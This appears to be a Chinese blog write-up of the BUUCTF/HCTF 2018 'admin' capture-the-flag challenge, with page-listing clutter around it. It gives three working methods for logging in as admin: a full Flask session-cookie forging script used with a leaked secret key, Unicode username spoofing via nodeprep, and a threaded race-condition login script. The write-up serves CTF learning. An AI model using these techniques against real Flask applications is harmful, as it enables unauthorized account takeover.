[BUUCTF][HCTF 2018]admin

最新推荐文章于 2022-09-22 14:44:12 发布
最新推荐文章于 2022-09-22 14:44:12 发布
阅读量1.1k 收藏
点赞数 2
分类专栏: 刷题记录 文章标签: php web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cosmoslin/article/details/121364717
版权

考点

  1. flask session伪造
  2. unicode欺骗
  3. 条件竞争

法一:flask session伪造

查看源码,提示you are not admin,猜测需要admin登录

注册登录,网站功能页面很多,依次查看源码,在change password界面发现源码

是一个flask框架,进入routes.py,看一下注册和登录部分的源码

@app.route('/register', methods = ['GET', 'POST'])
def register():

    if current_user.is_authenticated:
        return redirect(url_for('index'))

    form = RegisterForm()
    if request.method == 'POST':
        name = strlower(form.username.data)
        if session.get('image').lower() != form.verify_code.data.lower():
            flash('Wrong verify code.')
            return render_template('register.html', title = 'register', form=form)
        if User.query.filter_by(username = name).first():
            flash('The username has been registered')
            return redirect(url_for('register'))
        user = User(username=name)
        user.set_password(form.password.data)
        db.session.add(user)
        db.session.commit()
        flash('register successful')
        return redirect(url_for('login'))
    return render_template('register.html', title = 'register', form = form)

@app.route('/login', methods = ['GET', 'POST'])
def login():
    if current_user.is_authenticated:
        return redirect(url_for('index'))

    form = LoginForm()
    if request.method == 'POST':
        name = strlower(form.username.data)
        session['name'] = name
        user = User.query.filter_by(username=name).first()
        if user is None or not user.check_password(form.password.data):
            flash('Invalid username or password')
            return redirect(url_for('login'))
        login_user(user, remember=form.remember_me.data)
        return redirect(url_for('index'))
    return render_template('login.html', title = 'login', form = form)

根据登录逻辑,如果是已登陆状态,再次刷新会验证session,我们可以据此伪造成admin的session绕过登录

由于 flask 是非常轻量级的 Web框架 ,其 session 存储在客户端中(可以通过HTTP请求头Cookie字段的session获取),且仅对 session 进行了签名,缺少数据防篡改实现,这便很容易存在安全漏洞。

我们可以用python脚本把flask的session解密出来,但是如果想要加密伪造生成我们自己的session的话,还需要知道flask用来签名的SECRET_KEY

全局搜索,在config.py中发现

class Config(object):
    SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
    SQLALCHEMY_TRACK_MODIFICATIONS = True

猜测这个ckj123就是密钥

使用脚本对其进行解加密

flask_session_manager.py

""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast

# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
    raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    from abc import ABCMeta, abstractmethod
else: # > 3.4
    from abc import ABC, abstractmethod

# Lib for argument parsing
import argparse

# external Imports
from flask.sessions import SecureCookieSessionInterface

class MockApp(object):

    def __init__(self, secret_key):
        self.secret_key = secret_key


if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
    class FSCM(metaclass=ABCMeta):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e
else: # > 3.4
    class FSCM(ABC):
        def encode(secret_key, session_cookie_structure):
            """ Encode a Flask session cookie """
            try:
                app = MockApp(secret_key)

                session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.dumps(session_cookie_structure)
            except Exception as e:
                return "[Encoding error] {}".format(e)
                raise e


        def decode(session_cookie_value, secret_key=None):
            """ Decode a Flask cookie  """
            try:
                if(secret_key==None):
                    compressed = False
                    payload = session_cookie_value

                    if payload.startswith('.'):
                        compressed = True
                        payload = payload[1:]

                    data = payload.split(".")[0]

                    data = base64_decode(data)
                    if compressed:
                        data = zlib.decompress(data)

                    return data
                else:
                    app = MockApp(secret_key)

                    si = SecureCookieSessionInterface()
                    s = si.get_signing_serializer(app)

                    return s.loads(session_cookie_value)
            except Exception as e:
                return "[Decoding error] {}".format(e)
                raise e


if __name__ == "__main__":
    # Args are only relevant for __main__ usage
    
    ## Description for help
    parser = argparse.ArgumentParser(
                description='Flask Session Cookie Decoder/Encoder',
                epilog="Author : Wilson Sumanang, Alexandre ZANNI")

    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                                help='Session cookie structure', required=True)

    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                                help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                                help='Session cookie value', required=True)

    ## get args
    args = parser.parse_args()

    ## find the option chosen
    if(args.subcommand == 'encode'):
        if(args.secret_key is not None and args.cookie_structure is not None):
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif(args.subcommand == 'decode'):
        if(args.secret_key is not None and args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value,args.secret_key))
        elif(args.cookie_value is not None):
            print(FSCM.decode(args.cookie_value))

脚本有加密解密两种功能:

解密:
python flask_session_manager.py decode -c -s 
# -c是flask cookie里的session值 -s参数是SECRET_KEY
加密:
python flask_session_manager.py encode -s -t 
# -s参数是SECRET_KEY -t参数是session的参照格式,也就是session解密后的格式

先进行解密,将登录成功之后的cookie复制,填在对应参数后面(参数用引号括起来),得到:

image-20211116194522841

{'_fresh': True, '_id': b'34c682cab850f6adc36eca08b2c9be8e59105d8df741568de63e20758543f81b93568e59843adcf876fc1e877e2a19f9cd85aeb5970c424b680546afd81c78f2', 'csrf_token': b'd97754ea16e17aa9e761649413529025f0967910', 'image': b'wYpy', 'name': 'aaa', 'user_id': '10'}

将其中的name改为admin之后再进行加密

image-20211116194857026

将得到的cookie替换原来index页面的cookie即可伪造cookie,切换为admin用户

image-20211116195037724

关于flask中session的机制以及存在的漏洞,可以通过以下链接了解更多:

Python Web之flask session&格式化字符串漏洞

客户端 session 导致的安全问题

flask 源码解析:session

法二:Unicode欺骗

我们发现,不管是login、register还是change页面,只要是关于session['name']的操作,都先用了strlower函数将name转成小写,但是python中有自带的转小写函数lower,这里重写了一个,我们查看一下定义:

def strlower(username):
    username = nodeprep.prepare(username)
    return username

使用了nodeprep.prepare函数,该函数的作用是将大写转化为小写

但它同时会将unicode字符转换成A,而A再调用一次nodeprep.prepare函数会把A转换成a

也就是说我们可以使用ᴬdmin注册登录,登陆后再想办法让服务器再执行一次nodeprep.prepare,便可以变成admin账户

发现修改密码功能中存在

name = strlower(session['name'])

那么本题也就解出来了

法三:条件竞争

可以发现login函数和change函数都在没有完全check身份的情况下,执行了session有关的赋值。

我们可以这样设想,一个进程以正常账号一直依次进行登录、改密码操作,另一个进程同时一直依次进行注销、以admin用户名加进程1更改的新密码进行登录。就有可能出现当进程1进行到改密码函数时,进程2进行到登录操作,这个时候进程1需要从session中取出name,而进程2此时把session[‘name’]改成了admin。

条件竞争结束的标志为进程2登录操作成功,即重定向到/index

网上脚本:

import threading
import requests
import time

def login(s,username,password):
    data = {
        'username':username,
        'password':password,
        'submit':''
    }
    r  = s.post('http://13x.xx7.xx.xxx:9999/login',data=data)
    return r

def logout(s):
    s.get('http://13x.xx7.xx.xxx:9999/logout')

def change_pwd(s,newpass):
    data = {
        'newpassword':newpass
    }
    s.post('http://13x.xx7.xx.xxx:9999/change',data=data)

def func1(s):
    try:
        login(s,'Miracle778','Miracle778')
        change_pwd(s,'Miracle778')
    except Exception:
        pass

def func2(s):
    try:
        logout(s)
        r = login(s,'admin','Miracle778')
        if '<a href="/index">/index</a>' in r.text:
            print(r.text)
            exit(0)
    except Exception:
        pass

for i in range(10000):
    print(i)
    s = requests.Session()
    t1 = threading.Thread(target=func1,args=(s,))
    t2 = threading.Thread(target=func2,args=(s,))
    t2.start()
    t1.start()

感觉思路很有道理,但自己没有跑出来

参考链接:

https://www.jianshu.com/p/f92311564ad0

Snakin_ya
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
buuctf之[HCTF 2018]admin
qq_42728977的博客
12-06 458
[HCTF 2018]admin考点session伪造流程思考参考 考点 1、弱口令 2、flask框架 session伪造 3、代码审计 unicode strlower()函数审计 session伪造流程 change页面的源码,泄露后台源码 index源码看得到,要admin登录 所以查看后台源码 发现需要登录认证和session[‘name’]为admin,那就伪造呗。 flask session伪造 session漏洞 流程: 先注册一个用户test/test,并登录 拿到session,
BUUCTF:[HCTF 2018]admin
末初的CSDN博客
10-28 762
题目地址:https://buuoj.cn/challenges#[HCTF%202018]admin 第一种解法:弱密码 根据提示,尝试弱密码登录admin用户,当admin的密码为123时,登陆成功 第二种解法:Unicode欺骗 随便注册个用户mochu7,在Change Password 给出来题目源码,/hctf_flask/app/rotus.py register和login对用户名使用了自定义函数strlower() nodeprep.prepare()来自 from tw.
BUUCTF——[HCTF 2018]admin
Ho1aAs‘s Blog
05-16 817
文章目录利用点审题解题——Flask session解2——Unicode编码欺骗解3——(非预期)弱口令爆破参考完 利用点 Flask session Unicode编码欺骗 (非预期)弱口令爆破 审题 打开环境,主页仅提供了login和register两项服务,hctf的超链接打开是404 提示那么少,先看看主页的源码 结合题目以及提示,可以断定是要登录管理员账户,先注册一个账户,看看登录有些什么内容 新增了post和change password功能,在change password找到hin
BUUCTF之 [HCTF 2018]admin
m0_62107966的博客
09-22 881
BUUCTF之 [HCTF 2018]admin-----这里的ckj123等下使用脚本时是需要用来作为参数的。刚刚以 1 用户登进去后给了个session源代码的意思是:用户如果以admin的身份登录,就直接可以拿到flag了,所以直接注册账号为admin,密码为123就成功拿到flag了。如果使用脚本的话,就需要伪造session为admin登陆的时候。使用脚本解密,脚本命名为session解密.py运行得到:得到如下:将name的值修改为admin,重新用脚本在进行加密。
BUUCTF [HCTF 2018] admin
Senimo
12-10 955
BUUCTF [HCTF 2018] admin解法一:弱密码解法二:Flask伪造Session解法三:Unicode欺骗 考点: 弱密码 Flask伪造session Unicode欺骗 启动环境: 简洁的页面和一个菜单栏,菜单栏中包含登陆、注册功能 查看网页源码,发现提示: <!-- you are not admin --> 提示需要用admin用户登陆 解法一:弱密码 尝试使用admin登陆,密码123: 登陆成功,可以得到flag 首先注册正常的账户: test test
HCTF2018逆向LuckyStar分析
11-12
HCTF2018逆向LuckyStar分析HCTF2018逆向LuckyStar分析
2018手工更新FlatLab Admin Template
09-15
原来下载那个30分的,不是最新版的,浪费了时间,实在没办法就自己手工从官网下载,遂分享给大家
Ace Admin 2018.4最新版
04-17
Ace Admin 官网最新资源。比较好用的后台框架,推荐使用
Ace Admin 前端框架
05-30
Ace Admin 前端框架
fastadmin 七牛云
12-28
fastadmin 七牛云组件
buuctf-web-[HCTF 2018]admin-wp
居上
07-18 255
[HCTF 2018]admin 知识点 flask session伪造 过程 主页,有注册点和登陆点: 登陆点,测试了一下,没有发现sql注入,然后我们随便注册一个账户123 123,登陆看看 登陆成功之后,有个提示,说明得使用admin账户登陆之后才能得到flag changepassword,这里发现源码 @app.route('/code') def get_code(): @app.route('/index') def index(): @app.route('/register
buuctf--web--[HCTF 2018]admin
weixin_44866139的博客
05-15 695
先熟悉下网站,有这些功能:注册、登录、上传文章、修改密码、登出、无法注册admin,不能注册admin账户源码有提示 注册一个admin账号,失败了,提示注册失败 尝试注册界面看看有没有注入 username=1’–+ 大佬说有三种解法 flask session 伪造 unicode欺骗 条件竞争 flask session伪造 flask 源码解析:session 还是得多看源代码,修改密...
hctf2018-admin
Sea_Sand息禅
09-26 948
1、问题分析 熟悉一下网站,有这些功能:注册、登录、上传文章、修改密码、登出 对源码进行观察,发现 源码中存在 <!-- you are not admin --> 可能我们要以管理员身份登录吧。 继续找线索,最后发现在修改密码的源码中有: https://github.com/woadsl1234/hctf_flask/ 这个是网站用的flask源码,然后clone下来就可以进行代...
CTF-BUUCTF-Web-[HCTF 2018]admin
qq_42404383的博客
12-31 1343
CTF-BUUCTF-Web-[HCTF 2018]admin 题目: 先熟悉下网站,有这些功能:注册、登录、上传文章、修改密码、登出、无法注册admin。 得到的两个提示: 解题: GitHub上down源码 妈妈桑,python学了点毛! 从文件结构和routers.py中都可以看到调用了模板,打开一看,很熟悉的东西出来了 能够admin登录即可拿到flag!!! {% if cur...
BUUCTF】[HCTF 2018]admin——一上手flag就出现让我有措手不及,意犹未尽
algae
05-05 424
选择login 输入admin/123 真的,就这样,结束了?? yep flag{4e012e7f-7aa1-4ebf-ace7-51f7d70ee36a}
BUUCTF [HCTF 2018] WarmUp
qq_42158602的博客
01-08 555
开局一张图 直接查看源码 发现注释source.php 访问获得源码 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"s...
BUUCTF-[HCTF 2018]admin1
Monica的博客
11-15 6923
题目 分析 打开环境,页面啥也没有,日常查看源代码 提示说你不是admin,所以这题可能是我们为admin才可以得到flag 在login页面找到登录框 刚开始以为是sql注入,直接万能密码;结果试了几种方法发现不是报错就是提示用户名密码错误 ...
CG-CTF——WP(WEB[三])
hahaha233330的博客
01-11 486
CG-CTF——WriteUp(三) 工具: ①Winhex:图片隐写工具,这个很好用。 ②在线工具HtmlEncode/BASE64转换:注意源代码里奇怪的字符串,可以尝试解码(分清类型)。 ③BurpSuite:抓包工具,这个很好用。 ④Wireshark:抓包工具。使用说明 WEB 24、SQL注入1 听说你也会注入? 题目地址 打开题目出现了一个登陆界面,已经给了密码,直接。 点击 S...
BUUCTF学习笔记-admin
weixin_42271850的博客
03-18 3233
BUUCTF学习笔记-admin 时间:2020/03/17 考点:session欺骗、flask框架         首页中右键查看源代码,可以看到有一个提示。you are not admin,大概就能猜到这一题估计就是要使用admin的身份去登陆网站拿到flag。于是就使用账号admin密码123发现直接...
admin
最新发布
06-02
在 Django 中,`admin` 是一个应用程序,用于创建后台管理界面,方便管理员对网站的内容进行管理和维护。 在 Django 的后台管理界面中,管理员可以对网站的数据进行增删改查等操作,例如添加新的用户、编辑文章内容...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Snakin_ya

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值